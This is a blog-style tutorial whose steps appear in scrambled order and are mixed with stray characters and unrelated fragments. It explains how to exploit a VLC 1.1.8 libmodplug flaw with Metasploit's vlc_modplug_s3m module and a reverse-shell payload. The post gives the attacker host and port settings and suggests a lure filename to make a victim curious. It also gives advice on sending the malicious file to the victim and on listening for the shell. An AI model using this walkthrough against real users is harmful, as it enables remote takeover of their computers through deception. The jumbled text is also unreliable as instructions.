After victim opened our malicious s3m file, we got the shell_reverse_tcp payload as shown below.ġ. You can send the file via messenger, url, or anything…improve yourself.ĥ. Everything has been set up so nice until this way, the next step we need to send the s3m file to our victim. The next step before we send the malicious s3m file we should set up a listener to grab connection when victim opened the malicious s3m file in their VLC media player.Ĥ. ![]() root/.msf4/data/exploits/sora-aoi.s3m -> malicious file location. Set lport 443 -> your local port / attacker local port ![]() Set lhost 192.168.8.92 -> your localhost / attacker machine You simply need to download VLC on Windows 10, go to Settings > Apps. Set filename sora-aoi.s3m -> social engineering filename in order to make victim curious Size: 59.7 MB System: Windows XP and later. I've set up my malicious s3m file with the configuration like the picture below. To view the available options, you can run show options command. Use exploit/ windows/fileformat/vlc_modplug_s3mĢ. Open your metasploit console by typing msfconsole and then use the vlc_modplug_s3m exploit with windows meterpreter payload. Operating System(I'm using Backtrack 5 R1 in this tutorial and Metasploit Framework already included inside) Step By Step :ġ. Although other products that bundle libmodplug may be vulnerable, this module was only tested against VLC.Ģ. By creating a malicious S3M file, a remote attacker could execute arbitrary code. ![]() All versions prior to version 1.1.9 are affected. This module exploits an input validation error in libmod_plugin as included with VideoLAN VLC 1.1.8. This exploit we will perform using Metasploit framework, and according to website about this vulnerability : VLC is a free and open source cross-platform multimedia player and framework that plays most multimedia files as well as DVD, Audio CD, VCD, and various streaming protocols. If you still didn't know about VLC media player, here I copy from their original website : Just surfing around and found that VLC 1.1.8 have vulnerability that can be exploited.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |